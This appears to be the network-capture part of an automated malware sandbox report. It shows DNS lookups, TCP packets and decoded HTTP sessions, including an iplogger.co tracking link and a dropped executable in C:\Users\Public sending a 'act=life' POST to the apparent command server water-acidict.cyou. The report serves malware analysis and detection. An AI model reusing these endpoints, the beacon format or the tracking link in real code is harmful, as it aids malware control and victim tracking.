                                                                                                                                      Nov 29, 2024 23:11:55.329396009 CET4434989313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:55.329477072 CET49893443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:55.329533100 CET49893443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:55.329544067 CET4434989313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:55.329552889 CET49893443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:55.329557896 CET4434989313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:55.331947088 CET49898443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:55.331965923 CET4434989813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:55.332031012 CET49898443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.851716042 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.854259014 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.854310989 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:59.867286921 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:59.867297888 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.287729979 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.290927887 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.290962934 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.291033983 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.291079998 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.291107893 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.291119099 CET49904443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.291126013 CET4434990413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.293812990 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.293834925 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.297863007 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.298038006 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.298048973 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.750015020 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.750611067 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.750622034 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:00.751331091 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:00.751334906 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.138636112 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.139172077 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.139189005 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.139906883 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.139910936 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.194397926 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.197514057 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.197588921 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.197635889 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.197643042 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.197659016 CET49905443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.197663069 CET4434990513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.200932026 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.200958967 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.201042891 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.201199055 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.201210022 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.250679016 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.251218081 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.251224041 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.251678944 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.251682997 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.528358936 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.528820038 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.528834105 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.529387951 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.529392958 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634044886 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634083033 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634133101 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634138107 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.634179115 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.634367943 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.634387970 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.634404898 CET49906443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.634408951 CET4434990613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.636953115 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.636977911 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.637053967 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.637203932 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.637216091 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.740617037 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.740667105 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.740712881 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.740849018 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.740858078 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.740865946 CET49907443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.740869999 CET4434990713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.742952108 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.742981911 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.743053913 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.743185043 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.743201017 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.971457958 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.974729061 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.974850893 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.974865913 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.974901915 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.974955082 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.976255894 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.976267099 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.976279974 CET49908443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.976284981 CET4434990813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.979036093 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.979067087 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:01.979167938 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.979336977 CET49913443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:01.979350090 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.143258095 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.143610001 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.143624067 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.144018888 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.144022942 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.633869886 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.636843920 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.636894941 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.636934996 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.636951923 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.636965036 CET49909443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.636969090 CET4434990913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.639704943 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.639729977 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:02.639786959 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.639874935 CET49914443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:02.639887094 CET4434991413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.017824888 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.018420935 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.018436909 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.018841982 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.018847942 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.462090015 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.465276957 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.465318918 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.465344906 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.465373039 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.465540886 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.465559006 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.465570927 CET49910443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.465574980 CET4434991013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.467750072 CET49915443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.467791080 CET4434991513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.467876911 CET49915443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.468039036 CET49915443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.468050957 CET4434991513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.473853111 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.478107929 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.478136063 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.478661060 CET49911443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.478671074 CET4434991113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.542650938 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.546201944 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.546215057 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.546471119 CET49912443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:12:03.546475887 CET4434991213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.865523100 CET4434991313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:12:03.866008997 CET49913443192.168.2.413.107.246.63
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Nov 29, 2024 23:09:59.361207008 CET | 192.168.2.4 | 1.1.1.1 | c251 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2024 23:09:58.848608017 CET | 192.168.2.4 | 1.1.1.1 | 0x284d | Standard query (0) | iplogger.co | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:09:58.848881006 CET | 192.168.2.4 | 1.1.1.1 | 0x5816 | Standard query (0) | iplogger.co | 65 | IN (0x0001) | false
Nov 29, 2024 23:10:01.391649961 CET | 192.168.2.4 | 1.1.1.1 | 0x771a | Standard query (0) | water-acidict.cyou | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:10:03.351427078 CET | 192.168.2.4 | 1.1.1.1 | 0xc8cf | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:10:03.351520061 CET | 192.168.2.4 | 1.1.1.1 | 0x98f0 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Nov 29, 2024 23:10:03.398236036 CET | 192.168.2.4 | 1.1.1.1 | 0x812e | Standard query (0) | iplogger.co | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:10:03.398627996 CET | 192.168.2.4 | 1.1.1.1 | 0x83e1 | Standard query (0) | iplogger.co | 65 | IN (0x0001) | false
Nov 29, 2024 23:11:03.394181967 CET | 192.168.2.4 | 1.1.1.1 | 0xb0f2 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:11:03.394301891 CET | 192.168.2.4 | 1.1.1.1 | 0x97f9 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2024 23:09:59.252136946 CET | 1.1.1.1 | 192.168.2.4 | 0x284d | No error (0) | iplogger.co | | 172.67.167.249 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:09:59.252136946 CET | 1.1.1.1 | 192.168.2.4 | 0x284d | No error (0) | iplogger.co | | 104.21.82.93 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:09:59.361128092 CET | 1.1.1.1 | 192.168.2.4 | 0x5816 | No error (0) | iplogger.co | | | 65 | IN (0x0001) | false
Nov 29, 2024 23:10:01.807292938 CET | 1.1.1.1 | 192.168.2.4 | 0x771a | No error (0) | water-acidict.cyou | | 172.67.156.217 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:10:01.807292938 CET | 1.1.1.1 | 192.168.2.4 | 0x771a | No error (0) | water-acidict.cyou | | 104.21.8.50 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:10:03.489132881 CET | 1.1.1.1 | 192.168.2.4 | 0xc8cf | No error (0) | www.google.com | | 142.250.181.100 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:10:03.489276886 CET | 1.1.1.1 | 192.168.2.4 | 0x98f0 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Nov 29, 2024 23:10:03.538033962 CET | 1.1.1.1 | 192.168.2.4 | 0x812e | No error (0) | iplogger.co | | 104.21.82.93 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:10:03.538033962 CET | 1.1.1.1 | 192.168.2.4 | 0x812e | No error (0) | iplogger.co | | 172.67.167.249 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 23:10:03.541260004 CET | 1.1.1.1 | 192.168.2.4 | 0x83e1 | No error (0) | iplogger.co | | | 65 | IN (0x0001) | false
Nov 29, 2024 23:11:03.531680107 CET | 1.1.1.1 | 192.168.2.4 | 0x97f9 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Nov 29, 2024 23:11:03.532004118 CET | 1.1.1.1 | 192.168.2.4 | 0xb0f2 | No error (0) | www.google.com | | 142.250.181.100 | A (IP address) | IN (0x0001) | false
                                                                                                                                      • iplogger.co
                                                                                                                                      • https:
                                                                                                                                      • water-acidict.cyou
                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                      • otelrules.azureedge.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 172.67.167.249 | 443 | 5500 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:00 UTC | 660 | OUT | GET /1tJFB4 HTTP/1.1
                                                                                                                                      Host: iplogger.co
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-11-29 22:10:01 UTC | 1363 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:01 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: 56396975137264100=3; expires=Sat, 29 Nov 2025 22:10:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                      Set-Cookie: clhf03028ja=8.46.123.228; expires=Sat, 29 Nov 2025 22:10:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                      memory: 0.47846221923828125
                                                                                                                                      expires: Fri, 29 Nov 2024 22:10:01 +0000
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      strict-transport-security: max-age=604800
                                                                                                                                      strict-transport-security: max-age=31536000
                                                                                                                                      content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TFZln0cyw%2F7SBxvm1t26jQaV9lQGusgYpNEhWfuny8%2Bj861sRF9Eo%2BjksMJK%2FqvzxujF64Aitk%2FiMFZZJQaaM5QdJnmVPA5u8lbXYTnc30%2FxNfgo56CsLi8QD9fKsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ece4ac65c34f-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1674&rtt_var=637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1238&delivery_rate=1703617&cwnd=181&unsent_bytes=0&cid=94a26576f0a91552&ts=1000&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 172.67.167.249 | 443 | 5500 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:02 UTC | 639 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                                                      Host: iplogger.co
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://iplogger.co/1tJFB4
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: 56396975137264100=3; clhf03028ja=8.46.123.228
                                                                                                                                      2024-11-29 22:10:03 UTC | 1084 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:03 GMT
                                                                                                                                      Content-Type: image/x-icon
                                                                                                                                      Content-Length: 2833
                                                                                                                                      Connection: close
                                                                                                                                      last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                                      etag: "629f3a26-b11"
                                                                                                                                      strict-transport-security: max-age=604800
                                                                                                                                      strict-transport-security: max-age=31536000
                                                                                                                                      content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 4311
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xdqiGY7ZdsjggARHW4qzluDJZKX5taUB8SrvHgJpvPUeae5itTL46HMDYdznzoY7veuAvqqHjb2AD%2BAga4OWGTQJKp3%2BOQigXKqUc38ZW4mHFp9rWPoM5GFwoYJww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ecf17b13efa5-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1958&rtt_var=753&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1217&delivery_rate=1435594&cwnd=193&unsent_bytes=0&cid=e1559da315ba76ff&ts=452&x=0"


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      2 | 192.168.2.4 | 49738 | 172.67.156.217 | 443 | 3696 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:03 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:03 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-11-29 22:10:04 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:03 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=v4718kfuq5urol859qmsertkhd; expires=Tue, 25-Mar-2025 15:56:42 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQQPc43jlPEABo9wTNg%2B5algCjrmevPyT8TkLyWBioX5%2BxVRIf6dHGeoALd%2FRNr59SvxRWUNwOM0OIQeRyZoYI4k%2FUSPW0SR6UwclalVscmGx7gSjaAI9ruhySXrkhgVtPYOJGw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ecf3da2b41c6-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2170&min_rtt=2167&rtt_var=820&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1329085&cwnd=199&unsent_bytes=0&cid=77219084503b4050&ts=1070&x=0"
                                                                                                                                      2024-11-29 22:10:04 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-29 22:10:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      3 | 192.168.2.4 | 49744 | 104.21.82.93 | 443 | 5500 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:06 UTC | 401 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                                                      Host: iplogger.co
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: 56396975137264100=3; clhf03028ja=8.46.123.228
                                                                                                                                      2024-11-29 22:10:06 UTC | 1088 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:06 GMT
                                                                                                                                      Content-Type: image/x-icon
                                                                                                                                      Content-Length: 2833
                                                                                                                                      Connection: close
                                                                                                                                      last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                                      etag: "629f3a26-b11"
                                                                                                                                      strict-transport-security: max-age=604800
                                                                                                                                      strict-transport-security: max-age=31536000
                                                                                                                                      content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 4314
                                                                                                                                      Accept-Ranges: bytes
